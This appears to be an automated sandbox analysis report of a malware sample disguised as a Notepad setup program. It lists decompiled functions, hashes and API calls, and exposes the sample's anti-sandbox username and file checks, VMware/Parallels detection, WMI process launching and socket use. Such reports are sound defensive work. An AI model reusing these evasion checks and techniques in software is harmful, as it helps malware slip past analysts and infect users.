                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: c65f2f7900be347268ecb06d652d63ff972f9bb12939db74b80a776ac636d5f1
                                      • Instruction ID: 0820498589e11ff33423db07696112d0d57b183a1f587f84178fe40461c980a5
                                      • Opcode Fuzzy Hash: c65f2f7900be347268ecb06d652d63ff972f9bb12939db74b80a776ac636d5f1
                                      • Instruction Fuzzy Hash: 48E0466291A3C8BBDF12C7A66542ACEBFA40B22344F1888C8D140A7242C0749A48DB26
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E20C6 Relevance: .5, Instructions: 502COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bc2e3788365afafc72a46c1df4c6c86f55bf04dc52f861ab9053123fffbd75f
                                      • Instruction ID: 043a6723b7cd088c982a26dd52d70bd52f3efd18387823fecdfdf3ee617c62f2
                                      • Opcode Fuzzy Hash: 4bc2e3788365afafc72a46c1df4c6c86f55bf04dc52f861ab9053123fffbd75f
                                      • Instruction Fuzzy Hash: 2B128131A01269DFCB08CF29C4E05AC7BB7FF44355F2186AAED569B291D770DA81CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EE4FC Relevance: .1, Instructions: 119COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a20624c93ede2d283c588f0418485a120be06432b38f5356041a4a9951023a59
                                      • Instruction ID: 1bb80b9ba763bf3e44913aeab0c473c8ca83acaf397d919a26fb1603ef7ace68
                                      • Opcode Fuzzy Hash: a20624c93ede2d283c588f0418485a120be06432b38f5356041a4a9951023a59
                                      • Instruction Fuzzy Hash: EA417F262097C49FC315CB7D8891C9ABFE29FA3204769C6CCD0855F767C1B1E949C7A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407B50 Relevance: .1, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c98f4306506d02197349f117bc0784cdebd68f73380392c04d34607800d75ba5
                                      • Instruction ID: 79b52482fff9855e695113d8f671738deac2ac053c010198e9a5798394b3341f
                                      • Opcode Fuzzy Hash: c98f4306506d02197349f117bc0784cdebd68f73380392c04d34607800d75ba5
                                      • Instruction Fuzzy Hash: C6210624D1C34246F376822D48847936AA6A784354F14CE3EDD48E13E5E67DECC8C21A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402446 Relevance: .1, Instructions: 67COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E00402446(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _t13;
				signed int _t15;
				signed int _t34;
				signed int _t36;
				signed char* _t37;
				signed int _t38;
				signed int _t39;
				signed int* _t44;
				signed char* _t46;
				signed int _t47;

				_t34 = _a8;
				_t47 = _a12;
				_t36 = _t34 & 0xfffffffc;
				_t46 = _t36 + _a4;
				_t13 = _t34 >> 2;
				if(_t13 != 0) {
					_t44 = _t36 +  ~_t13 * 4 + _a4;
					_t37 = _t46;
					do {
						asm("rol eax, 0xf");
						asm("rol eax, 0xd");
						_t47 = ( *_t44 * 0xcc9e2d51 * 0x1b873593 ^ _t47) + ( *_t44 * 0xcc9e2d51 * 0x1b873593 ^ _t47) * 4 - 0x19ab949c;
						_t44 =  &(_t44[1]);
					} while (_t44 != _t37);
				}
				_t15 = _t34 & 0x00000003;
				if(_t15 == 2) {
					_t38 = 0;
					goto L8;
				} else {
					if(_t15 == 3) {
						_t38 = (_t46[2] & 0x000000ff) << 0x10;
						L8:
						_t39 = _t38 ^ (_t46[1] & 0x000000ff) << 0x00000008;
						goto L9;
					} else {
						if(_t15 == 1) {
							_t39 = 0;
							L9:
							asm("rol eax, 0xf");
							_t47 = _t47 ^ ( *_t46 & 0x000000ff ^ _t39) * 0xcc9e2d51 * 0x1b873593;
						}
					}
				}
				return ((_t47 ^ _t34 ^ (_t47 ^ _t34) >> 0x00000010) * 0x85ebca6b >> 0x0000000d ^ (_t47 ^ _t34 ^ (_t47 ^ _t34) >> 0x00000010) * 0x85ebca6b) * 0xc2b2ae35 ^ ((_t47 ^ _t34 ^ (_t47 ^ _t34) >> 0x00000010) * 0x85ebca6b >> 0x0000000d ^ (_t47 ^ _t34 ^ (_t47 ^ _t34) >> 0x00000010) * 0x85ebca6b) * 0xc2b2ae35 >> 0x00000010;
			}













                                      0x0040244a
                                      0x0040244e
                                      0x00402454
                                      0x00402459
                                      0x0040245f
                                      0x00402462
                                      0x00402469
                                      0x0040246d
                                      0x0040246f
                                      0x00402475
                                      0x00402480
                                      0x00402483
                                      0x0040248a
                                      0x0040248d
                                      0x0040246f
                                      0x00402493
                                      0x00402499
                                      0x004024fc
                                      0x00000000
                                      0x0040249b
                                      0x0040249e
                                      0x004024b0
                                      0x004024b3
                                      0x004024ba
                                      0x00000000
                                      0x004024a0
                                      0x004024a3
                                      0x004024a5
                                      0x004024bc
                                      0x004024c7
                                      0x004024d0
                                      0x004024d0
                                      0x004024a3
                                      0x0040249e
                                      0x004024fb

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1bb12fd28983538cf371d34fec06ec2c8fc80d3349e2e0be66397c7f0c841eca
                                      • Instruction ID: 7be8a8d7acb75c00bdebabba72bc16afa5b0ea55f0702d97b1ef5954f73505b6
                                      • Opcode Fuzzy Hash: 1bb12fd28983538cf371d34fec06ec2c8fc80d3349e2e0be66397c7f0c841eca
                                      • Instruction Fuzzy Hash: 7B11363131821A0ED325DC3D8E8A127B7C6D7C5210F54893FE89ACB3D1E478DA5AD2A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404120 Relevance: .1, Instructions: 58COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 89%
                                      			E00404120(void* __fp0) {
				signed int _v24;
				signed int _t21;
				signed int _t28;
				signed int _t29;
				unsigned int _t30;
				unsigned int _t36;
				signed int _t37;
				signed int _t41;
				signed int _t42;
				unsigned int _t45;
				unsigned int _t49;
				signed int* _t57;

				_t42 =  *0x424fac; // 0x0
				_t21 =  *0x424fa8; // 0xb
				_t37 =  *0x424fb0; // 0x5497fdb5
				_t29 =  *0x424fb4; // 0x106689d4
				 *_t57 = _t37;
				 *0x424fa8 = _t37;
				_t38 =  *_t57;
				_t56 = _t21 ^ _t21 << 0x00000017;
				_v24 = _t29;
				_t49 = _t42 ^ (_t42 << 0x00000020 | _t21) << 0x17;
				 *0x424fac = _t29;
				_t30 = _v24;
				_t41 =  *_t57 ^ (_t30 << 0x00000020 | _t38) >> 0x1a ^ _t21 ^ _t21 << 0x00000017 ^ (_t49 << 0x00000020 | _t56) >> 0x11;
				 *0x424fb0 = _t41;
				_t36 = _v24 ^ _t30 >> 0x0000001a ^ _t49 ^ _t49 >> 0x00000011;
				_t45 = _t36;
				asm("adc edx, [esp+0x4]");
				 *0x424fb4 = _t36;
				_t28 = (_t45 << 0x00000020 | _t41 +  *_t57) >> 0xb;
				 *_t57 = _t28;
				_v24 = _t45 >> 0xb;
				asm("fild qword [esp]");
				return _t28;
			}















                                      0x00404127
                                      0x0040412d
                                      0x00404132
                                      0x00404138
                                      0x00404144
                                      0x00404150
                                      0x00404156
                                      0x0040415b
                                      0x0040415d
                                      0x00404161
                                      0x00404165
                                      0x0040416b
                                      0x0040418c
                                      0x00404195
                                      0x0040419b
                                      0x004041a0
                                      0x004041a2
                                      0x004041a6
                                      0x004041ac
                                      0x004041b3
                                      0x004041b6
                                      0x004041ba
                                      0x004041ca

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c10a91c278383aa1daecd3da3ada66852a96d673215edf4d1e9866bc2019ffd2
                                      • Instruction ID: 1f50052fb507fd8a21823964d6503f13664692f934f5af635af07eabe4d7d022
                                      • Opcode Fuzzy Hash: c10a91c278383aa1daecd3da3ada66852a96d673215edf4d1e9866bc2019ffd2
                                      • Instruction Fuzzy Hash: C6111C72B082149FC318DF6AEA8064AB7E2F7CC310F86853DE949C7794D6709C15DB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9E7E Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion
                                      • String ID:
                                      • API String ID: 2793162063-0
                                      • Opcode ID: 9bd31347606c97fb0e9bf6c3c65c8f4cfb63b626d92c54a12c4832f3ff7d0b43
                                      • Instruction ID: 40147a7b8d3d28cf3da8b09ddb05fa1f60e8e5b690be847c48fd5dcda3ed35f0
                                      • Opcode Fuzzy Hash: 9bd31347606c97fb0e9bf6c3c65c8f4cfb63b626d92c54a12c4832f3ff7d0b43
                                      • Instruction Fuzzy Hash: 7EE0E5B1A51284EFE710CB9DCD42B4C73F8EF05B88F540094E905EB782D6B5EE10DA54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9ECF Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion
                                      • String ID:
                                      • API String ID: 2793162063-0
                                      • Opcode ID: 6380cd29a84552bc9504bd3dd7dffd6d7dd4a96f0085ed49b1d8a96b33e6956d
                                      • Instruction ID: 944a05f5538c265677521d1dc78e59251330da37f281f50959654efad5a2ea4e
                                      • Opcode Fuzzy Hash: 6380cd29a84552bc9504bd3dd7dffd6d7dd4a96f0085ed49b1d8a96b33e6956d
                                      • Instruction Fuzzy Hash: 05E0E571A41684EFD710CB9DCD82B4C73F8AF05B88F5804A4E509EB782D674EE10DA54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA954 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7f0b9217784534b5faaed6ea7cf9b711b647bd11df21ec4eb28890a62b8d291a
                                      • Instruction ID: 02f23f29ec18854db6d0e7cc4bc5b7cab390f07376cb572faa4ce52d4930c70d
                                      • Opcode Fuzzy Hash: 7f0b9217784534b5faaed6ea7cf9b711b647bd11df21ec4eb28890a62b8d291a
                                      • Instruction Fuzzy Hash: A1C08C72610248EFCB12CF5DCA02A0AB3F8EB00B48F0002F0E002EB200D770EF00CA54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E956D Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc7fe59a4b8a6a62216f91363d27c0aaa9956475599f33ca2db264bfaa45f8e8
                                      • Instruction ID: ff7b755e27313bec30199fb430c49c250b39fdb30b58f68779e47b2259e33fe1
                                      • Opcode Fuzzy Hash: bc7fe59a4b8a6a62216f91363d27c0aaa9956475599f33ca2db264bfaa45f8e8
                                      • Instruction Fuzzy Hash: A8C01230912288EFCB01CB89C212B9ABBF8EB00749F204094E400E3241C278EF00AB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E910E Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a9dd0ce9f8081e748ac72becd36064f8be19ca80f2bfbebf7e67bebac1c5ce0
                                      • Instruction ID: 70350a7fe61a1b7af4f8bbbc9b12ba019c40a4c300e540abae43ca4921a94070
                                      • Opcode Fuzzy Hash: 0a9dd0ce9f8081e748ac72becd36064f8be19ca80f2bfbebf7e67bebac1c5ce0
                                      • Instruction Fuzzy Hash: 88B0126061820D7F8B08C787D802C9EB7BDD60225CF000184B9016224091F0FD404260
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9100 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8875717e1a7d0122a448873d6540e11825907da3543076021a44e732ccc3e6a8
                                      • Instruction ID: 98790265235e98c9312c919b89e696547998febc0019e7b499a082d4753a36b4
                                      • Opcode Fuzzy Hash: 8875717e1a7d0122a448873d6540e11825907da3543076021a44e732ccc3e6a8
                                      • Instruction Fuzzy Hash: 77B0126061020D7F8B08C787D802C8EB7BDDA0125CF200188B8006224091B0FD404270
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E74E0 Relevance: 81.3, APIs: 25, Strings: 29, Instructions: 300COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: Co$Do$HDo$accep$connectio$cooki$dEo$dat$eta$expec$expect-c$expire$forwarde$hos$if-matc$if-rang$keep-aliv$locatio$origi$rang$refere$serve$set-cooki$upgrad$user-agen$var$x-traffi$xDo$Co
                                      • API String ID: 1475443563-3999747238
                                      • Opcode ID: 1816a77767b1a2de34ba12d6eb02408dc779ef3dfc68108c77fe72641b092d44
                                      • Instruction ID: 8285f633e1486e5e28085b2271f8e3da73ff560d9b53165980cc32841b87c4ba
                                      • Opcode Fuzzy Hash: 1816a77767b1a2de34ba12d6eb02408dc779ef3dfc68108c77fe72641b092d44
                                      • Instruction Fuzzy Hash: F081B149B8F3C832DA60962B1C46BBB2E4B6B21756F0545A4FF44ED7C7FA91CE038149
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA7B9 Relevance: 49.1, APIs: 14, Strings: 14, Instructions: 139stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006EA63E: malloc.MSVCRT ref: 006EA64C
                                        • Part of subcall function 006EA63E: GetUserNameW.ADVAPI32(00000000,00000000), ref: 006EA65E
                                        • Part of subcall function 006EA63E: ??3@YAXPAX@Z.MSVCRT ref: 006EA669
                                        • Part of subcall function 006EA730: malloc.MSVCRT ref: 006EA73E
                                        • Part of subcall function 006EA730: GetComputerNameW.KERNEL32(00000000,00000010), ref: 006EA750
                                        • Part of subcall function 006EA730: ??3@YAXPAX@Z.MSVCRT ref: 006EA75B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA7D5
                                        • Part of subcall function 006EA93A: GetFileAttributesW.KERNEL32(?,006EB609,?), ref: 006EA93E
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA7F1
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA7F4
                                      • lstrcmpW.KERNEL32(00000000,Wilber), ref: 006EA811
                                      • StrCmpNIW.SHLWAPI(00000000,006F5120,00000002), ref: 006EA825
                                      • StrCmpNIW.SHLWAPI(00000000,006F5118,00000002), ref: 006EA837
                                      • lstrcmpW.KERNEL32(00000000,admin), ref: 006EA848
                                      • lstrcmpW.KERNEL32(00000000,SystemIT), ref: 006EA854
                                      • StrCmpW.SHLWAPI(00000000,admin), ref: 006EA866
                                      • StrCmpW.SHLWAPI(?,KLONE_X64-PC), ref: 006EA875
                                      • StrCmpW.SHLWAPI(00000000,John), ref: 006EA885
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA921
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA924
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA92A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$lstrcmp$Namemalloc$AttributesComputerFileUser
                                      • String ID: C:\123\email.doc$C:\123\email.docx$C:\a\foobar.bmp$C:\a\foobar.doc$C:\a\foobar.gif$C:\email.doc$C:\email.htm$C:\loaddll.exe$C:\take_screenshot.ps1$John$KLONE_X64-PC$SystemIT$Wilber$admin
                                      • API String ID: 2231711986-3596196378
                                      • Opcode ID: b562884cef224b63f6e2595573b4f9950d573b799de4596c1d38e4577e07ee00
                                      • Instruction ID: ce0aece8ea535e3b28db79d4143984d45ca03f0fdeaa8a8ea554e2d25c0d2009
                                      • Opcode Fuzzy Hash: b562884cef224b63f6e2595573b4f9950d573b799de4596c1d38e4577e07ee00
                                      • Instruction Fuzzy Hash: 3931233125738A69AA50B7E35C06F3B2AAF8E60755B13002EFA49D5683EF40FC0645A7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E6F32 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 231memorystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SysAllocString.OLEAUT32(ROOT\CIMV2), ref: 006E6F92
                                      • SysAllocString.OLEAUT32(Win32_Process), ref: 006E6FD4
                                      • SysAllocString.OLEAUT32(Create), ref: 006E7006
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006E34D4), ref: 006E705B
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006E34D4), ref: 006E7065
                                      • calloc.MSVCRT ref: 006E7071
                                      • _snwprintf.NTDLL ref: 006E7091
                                      • SysAllocString.OLEAUT32(?), ref: 006E70A3
                                      • SysAllocString.OLEAUT32(006E34D4), ref: 006E70B1
                                      • SysFreeString.OLEAUT32(?), ref: 006E711B
                                      • SysFreeString.OLEAUT32(?), ref: 006E7120
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E712E
                                      • SysFreeString.OLEAUT32(?), ref: 006E7146
                                      • SysFreeString.OLEAUT32(006E34D4), ref: 006E7158
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$Alloc$Free$lstrlen$??3@_snwprintfcalloc
                                      • String ID: "%s" %s$CommandLine$Create$CurrentDirectory$ROOT\CIMV2$Win32_Process
                                      • API String ID: 4216031338-2535204926
                                      • Opcode ID: 4a1f3aa2fd246f1b20be5879b0a374b81a156137a5592f0b87ebf7b965ff39b0
                                      • Instruction ID: 8865009dd990fe2600978cae587bde300b2c8fb06b22e4a570e9dbdff99d9509
                                      • Opcode Fuzzy Hash: 4a1f3aa2fd246f1b20be5879b0a374b81a156137a5592f0b87ebf7b965ff39b0
                                      • Instruction Fuzzy Hash: 38710670A01329AFCB10DBA5CC88DEEBFBAFF49754B144459F509E7260DA719A41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA57C Relevance: 35.0, APIs: 2, Strings: 18, Instructions: 50stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006EA63E: malloc.MSVCRT ref: 006EA64C
                                        • Part of subcall function 006EA63E: GetUserNameW.ADVAPI32(00000000,00000000), ref: 006EA65E
                                        • Part of subcall function 006EA63E: ??3@YAXPAX@Z.MSVCRT ref: 006EA669
                                      • lstrcmpiW.KERNEL32(006F4ED8,00000000,006EA46B,?,00000000), ref: 006EA61B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA62F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$NameUserlstrcmpimalloc
                                      • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sandbox$maltest$malware$milozs$sand box$test user$timmy$user$virus
                                      • API String ID: 826662291-2542899860
                                      • Opcode ID: 0066facef564373f44c72e2c0fe228f36a5013f95da6f74a4b7cb9fc74cd72d6
                                      • Instruction ID: 500ffec0849b9422931af70c616d5ddbf4f0b906dd3ae9fc70e5bbb101f51c40
                                      • Opcode Fuzzy Hash: 0066facef564373f44c72e2c0fe228f36a5013f95da6f74a4b7cb9fc74cd72d6
                                      • Instruction Fuzzy Hash: 9B11DFB1C0124DABCB108FC5E9885FEBFB6FF45758F614108E6107AA10DBB05A0ACF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F068D Relevance: 30.2, APIs: 20, Instructions: 168networkregistryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WS2_32(?,00000001,00000000), ref: 006F06B7
                                      • WSAGetLastError.WS2_32(?,?,?,006F131D,00000000,00000064), ref: 006F06CD
                                      • WSAGetLastError.WS2_32(?,?,?,006F131D,00000000,00000064), ref: 006F06D3
                                      • WSAGetLastError.WS2_32(?,?,?,006F131D,00000000,00000064), ref: 006F06D7
                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,006F131D,00000000,00000064), ref: 006F06F4
                                      • GetLastError.KERNEL32(?,?,?,006F131D,00000000,00000064), ref: 006F0704
                                      • GetLastError.KERNEL32(?,?,?,006F131D,00000000,00000064), ref: 006F070A
                                      • GetLastError.KERNEL32(?,?,?,006F131D,00000000,00000064), ref: 006F070E
                                      • closesocket.WS2_32(00000000), ref: 006F072F
                                      • memset.NTDLL ref: 006F0745
                                      • GetLastError.KERNEL32 ref: 006F07A6
                                      • WSAGetLastError.WS2_32 ref: 006F07B3
                                      • WSAGetLastError.WS2_32 ref: 006F07BD
                                      • WSAGetLastError.WS2_32 ref: 006F07C5
                                      • closesocket.WS2_32(?), ref: 006F07E9
                                      • CloseHandle.KERNEL32(73891846), ref: 006F07F7
                                      • RegisterWaitForSingleObject.KERNEL32(006F1471,7459C085,006F0870,006F131D,000000FF,00000004), ref: 006F0834
                                      • GetLastError.KERNEL32 ref: 006F0844
                                      • GetLastError.KERNEL32 ref: 006F084A
                                      • GetLastError.KERNEL32 ref: 006F084E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$Handleclosesocket$CloseInformationObjectRegisterSingleWaitmemsetsocket
                                      • String ID:
                                      • API String ID: 1241441197-0
                                      • Opcode ID: b2f4314ed96417bfc93cb6c71ddc870f025f6d7fc35228d75fb12e547601d152
                                      • Instruction ID: dac15ee5e5c7af1cdbb17d6ba283a3e74f112356cac169669c6663d11ffa2f87
                                      • Opcode Fuzzy Hash: b2f4314ed96417bfc93cb6c71ddc870f025f6d7fc35228d75fb12e547601d152
                                      • Instruction Fuzzy Hash: B651B032500A0AEFEB14AF70CC45BBA77BAFF04364F204229E626C6192D775E951CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EAC99 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrIW.SHLWAPI(?,VMWare), ref: 006EAD51
                                      • StrStrIW.SHLWAPI(?,Parallels), ref: 006EAD5F
                                      • wcscmp.NTDLL ref: 006EAD6D
